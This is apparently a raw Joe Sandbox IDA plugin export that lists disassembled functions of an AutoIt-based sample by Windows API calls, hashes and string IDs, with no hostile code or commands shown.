                                                        • Instruction ID: 42b89b097316f5538b354cb3d8b9a137904ec3fe6c02b6ed1aa24553936cd8bc
                                                        • Opcode Fuzzy Hash: 0ba1bb2c969c7dfcf2ba0e2404e9a5d78059d2fe7d83226a6e75d13cafecba8c
                                                        • Instruction Fuzzy Hash: 13115E766106049FDB11DF29D845A2AF7E9EF85324F01851EF9AADB291DB30B805CB81
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003B9468,?,003CFB84,?), ref: 003AA097
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003B9468,?,003CFB84,?), ref: 003AA0A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: a40b32980b09dca819941e9230022f64f80accb988017cd8cc9506319175128f
                                                        • Instruction ID: a8c631cd6317b46f900ec334f69b71b5558781ba4549c91cced70d0bc39358fe
                                                        • Opcode Fuzzy Hash: a40b32980b09dca819941e9230022f64f80accb988017cd8cc9506319175128f
                                                        • Instruction Fuzzy Hash: EEF0823651522DBBDB629FA4CC48FEA776DFF09361F008165F909D6181D730A944CBA1
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00398309), ref: 003981E0
                                                        • CloseHandle.KERNEL32(?,?,00398309), ref: 003981F2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 48d24f682b7f8a80025616b51800e70f2d25b5a9034813f14dce7f8e9c395702
                                                        • Instruction ID: ffc842f8062377361415e973faf860366a6a90fb3d44e1eff63b95ec1e193ddc
                                                        • Opcode Fuzzy Hash: 48d24f682b7f8a80025616b51800e70f2d25b5a9034813f14dce7f8e9c395702
                                                        • Instruction Fuzzy Hash: EBE0B672010A20AEEB272B60EC09D777BAEEF44310B148829B8A6C4475DB62AC91DB14
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00368D57,?,?,?,00000001), ref: 0036A15A
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0036A163
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 80066a17d61224719bcfd67e7de031ed731fc0b2a70e43f52ccc3a4479637432
                                                        • Instruction ID: 9662621202b121151370905b5c84057a9e8589d17773eeed5b99fff3742932b4
                                                        • Opcode Fuzzy Hash: 80066a17d61224719bcfd67e7de031ed731fc0b2a70e43f52ccc3a4479637432
                                                        • Instruction Fuzzy Hash: 47B09235054248BFCA022B91EC09F883F6EEB84BA2F404020FA0DC4060CB6266508B91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7a81d0d585199ab859bd360904c7c3add7fa6e340ca80e9e1806c6e1aba9732d
                                                        • Instruction ID: b293a8bced93cd39bcede41ba292ba0a6ebf58d1c918d5af701560acced2801b
                                                        • Opcode Fuzzy Hash: 7a81d0d585199ab859bd360904c7c3add7fa6e340ca80e9e1806c6e1aba9732d
                                                        • Instruction Fuzzy Hash: 6832F426D2AF414DD7239634E832335A38DAFB73D5F55D737E81AB5AA9EB28C4834100
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4a6c46a8d3d2d29eef4a73a0f2e8b1af26d2654e412811a61722057259f76e6b
                                                        • Instruction ID: 2a729c34657995584f8fce06ebaf5143415579a231e174854d7f9fd1b56be413
                                                        • Opcode Fuzzy Hash: 4a6c46a8d3d2d29eef4a73a0f2e8b1af26d2654e412811a61722057259f76e6b
                                                        • Instruction Fuzzy Hash: 42B1F120E2AF414DD72396399931336BB5CAFBB2D5F52D71BFC2A74E22EB2185834141
                                                        APIs
                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003A4C4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: mouse_event
                                                        • String ID:
                                                        • API String ID: 2434400541-0
                                                        • Opcode ID: 51cec7d80d6afed14f237c0ac160ef401231e93478a246643e3b8a5a98886aa5
                                                        • Instruction ID: 4cafddca28b932fca62f5dfe0c4293384709dea2d1d20985f2a2b9c47c628475
                                                        • Opcode Fuzzy Hash: 51cec7d80d6afed14f237c0ac160ef401231e93478a246643e3b8a5a98886aa5
                                                        • Instruction Fuzzy Hash: 4DD05E9916520978EC1E0720AE0FF7A410CE3D37A2FD18149720ACA0C1FCD06C406130
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00398389), ref: 003987D1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: 62fc4445b00a31f26f91c33b9f663af35fd553a28bdec64c6c741757f5c9415a
                                                        • Instruction ID: e5519b0abcb716acfb599c30975b98c02981ffdb91e67160a53e5cc97ef2f8b7
                                                        • Opcode Fuzzy Hash: 62fc4445b00a31f26f91c33b9f663af35fd553a28bdec64c6c741757f5c9415a
                                                        • Instruction Fuzzy Hash: F3D05E3226050EAFEF019EA4DC01EBE3B6AEB04B01F408111FE15C50A1C775E835AB60
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0036A12A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 3a05c1f2d67906932a194d85ea3797e36fc41065210813540e99d53e520cab66
                                                        • Instruction ID: 12ca8c5472b1c937089a1010175d978ca261ef9d24051b911c9533b9de4ddb52
                                                        • Opcode Fuzzy Hash: 3a05c1f2d67906932a194d85ea3797e36fc41065210813540e99d53e520cab66
                                                        • Instruction Fuzzy Hash: F1A0113000020CBB8A022B82EC08888BFAEEA802A0B008020F80C800228B32AA208A80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 316002f89f9f53e2d1fea59798b575bdb7bcdab01980e690446c591b6dba4c3f
                                                        • Instruction ID: 302e11464f74a596c43f0d280db53d0ec874520fc454104fdb86dc1350eacc6d
                                                        • Opcode Fuzzy Hash: 316002f89f9f53e2d1fea59798b575bdb7bcdab01980e690446c591b6dba4c3f
                                                        • Instruction Fuzzy Hash: EF221530A04546CBDF2B8B14C494B7C77B5FB01306F2A846ADD86AB9A2DB70DD9AC741
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction ID: 85380d2d9f2e3314a3db667886187a9941c31b42b9ae8fd72f1966be194b8039
                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction Fuzzy Hash: 1DC184362055930ADF6F463A847403FFAA15EA27B131F876DD8B3CB5D8EE20C965D620
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction ID: 46fd985755d35655771a00196b6f982ecd054c14570a801d2451a8b5b262341b
                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction Fuzzy Hash: 98C195322055930ADF6F463AC43443FBAA15EA27B131F876DD4B3DB1D9EE50C925E620
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: 59bc2b18b820ebda61efb1d8ccc3551208d34ba4458734af85810cfbdba580bf
                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: 92C180322091930ADF6E463AC47413EFBA15EA27B131F876DD4B3CB1D8EE60C965D660
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 003B785B
                                                        • DeleteObject.GDI32(00000000), ref: 003B786D
                                                        • DestroyWindow.USER32 ref: 003B787B
                                                        • GetDesktopWindow.USER32 ref: 003B7895
                                                        • GetWindowRect.USER32(00000000), ref: 003B789C
                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003B79DD
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003B79ED
                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7A35
                                                        • GetClientRect.USER32(00000000,?), ref: 003B7A41
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003B7A7B
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7A9D
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7AB0
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7ABB
                                                        • GlobalLock.KERNEL32(00000000), ref: 003B7AC4
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7AD3
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003B7ADC
                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7AE3
                                                        • GlobalFree.KERNEL32(00000000), ref: 003B7AEE
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7B00
                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003D2CAC,00000000), ref: 003B7B16
                                                        • GlobalFree.KERNEL32(00000000), ref: 003B7B26
                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 003B7B4C
                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 003B7B6B
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7B8D
                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B7D7A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 2211948467-2373415609
                                                        • Opcode ID: 8bbe73e111b253dc3188a2c8950c9fba4b7235d751a407b9727d7979d2591f78
                                                        • Instruction ID: 1b7f74e86aad24c8ed5175a67d1a2130f0611f602eb1a5967ad2d162ad26fbb9
                                                        • Opcode Fuzzy Hash: 8bbe73e111b253dc3188a2c8950c9fba4b7235d751a407b9727d7979d2591f78
                                                        • Instruction Fuzzy Hash: AF026A71900115AFDB16DFA8DD89EAE7BB9EF88314F148169F905EB2A1C770AD01CB60
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,003CF910), ref: 003C3627
                                                        • IsWindowVisible.USER32(?), ref: 003C364B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpperVisibleWindow
                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 4105515805-45149045
                                                        • Opcode ID: a4fc63a3a559906b5355e4ab35e57c19c545d13e5d5e05eff0ee50e974e4181d
                                                        • Instruction ID: f1085496e0613266114fdb343f93de4d2bbe539d113f7bcdbd25b77375f27df4
                                                        • Opcode Fuzzy Hash: a4fc63a3a559906b5355e4ab35e57c19c545d13e5d5e05eff0ee50e974e4181d
                                                        • Instruction Fuzzy Hash: 4ED159342043019BCA06EF10C852F6EB7E5AF95394F15846DF8869F7A2CB31EE0ACB41
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 003CA630
                                                        • GetSysColorBrush.USER32(0000000F), ref: 003CA661
                                                        • GetSysColor.USER32(0000000F), ref: 003CA66D
                                                        • SetBkColor.GDI32(?,000000FF), ref: 003CA687
                                                        • SelectObject.GDI32(?,00000000), ref: 003CA696
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003CA6C1
                                                        • GetSysColor.USER32(00000010), ref: 003CA6C9
                                                        • CreateSolidBrush.GDI32(00000000), ref: 003CA6D0
                                                        • FrameRect.USER32(?,?,00000000), ref: 003CA6DF
                                                        • DeleteObject.GDI32(00000000), ref: 003CA6E6
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 003CA731
                                                        • FillRect.USER32(?,?,00000000), ref: 003CA763
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003CA78E
                                                          • Part of subcall function 003CA8CA: GetSysColor.USER32(00000012), ref: 003CA903
                                                          • Part of subcall function 003CA8CA: SetTextColor.GDI32(?,?), ref: 003CA907
                                                          • Part of subcall function 003CA8CA: GetSysColorBrush.USER32(0000000F), ref: 003CA91D
                                                          • Part of subcall function 003CA8CA: GetSysColor.USER32(0000000F), ref: 003CA928
                                                          • Part of subcall function 003CA8CA: GetSysColor.USER32(00000011), ref: 003CA945
                                                          • Part of subcall function 003CA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003CA953
                                                          • Part of subcall function 003CA8CA: SelectObject.GDI32(?,00000000), ref: 003CA964
                                                          • Part of subcall function 003CA8CA: SetBkColor.GDI32(?,00000000), ref: 003CA96D
                                                          • Part of subcall function 003CA8CA: SelectObject.GDI32(?,?), ref: 003CA97A
                                                          • Part of subcall function 003CA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 003CA999
                                                          • Part of subcall function 003CA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003CA9B0
                                                          • Part of subcall function 003CA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 003CA9C5
                                                          • Part of subcall function 003CA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003CA9ED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 3521893082-0
                                                        • Opcode ID: dd69d485199d5c84819074fa0a1b6f49ebbf7f695c9a6cbafe62b8b7c7fa1f4b
                                                        • Instruction ID: b853a638c549108308d87f039fc350f92147bf49ae5a85ad6d3ee60e56d8fdd3
                                                        • Opcode Fuzzy Hash: dd69d485199d5c84819074fa0a1b6f49ebbf7f695c9a6cbafe62b8b7c7fa1f4b
                                                        • Instruction Fuzzy Hash: 66917B72008705AFC7129F64DC08E5B7BAEFF89325F144A2DFAA2D61A0D771E944CB52
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 003B74DE
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003B759D
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003B75DB
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003B75ED
                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 003B7633
                                                        • GetClientRect.USER32(00000000,?), ref: 003B763F
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 003B7683
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003B7692
                                                        • GetStockObject.GDI32(00000011), ref: 003B76A2
                                                        • SelectObject.GDI32(00000000,00000000), ref: 003B76A6
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003B76B6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003B76BF
                                                        • DeleteDC.GDI32(00000000), ref: 003B76C8
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003B76F4
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 003B770B
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 003B7746
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003B775A
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 003B776B
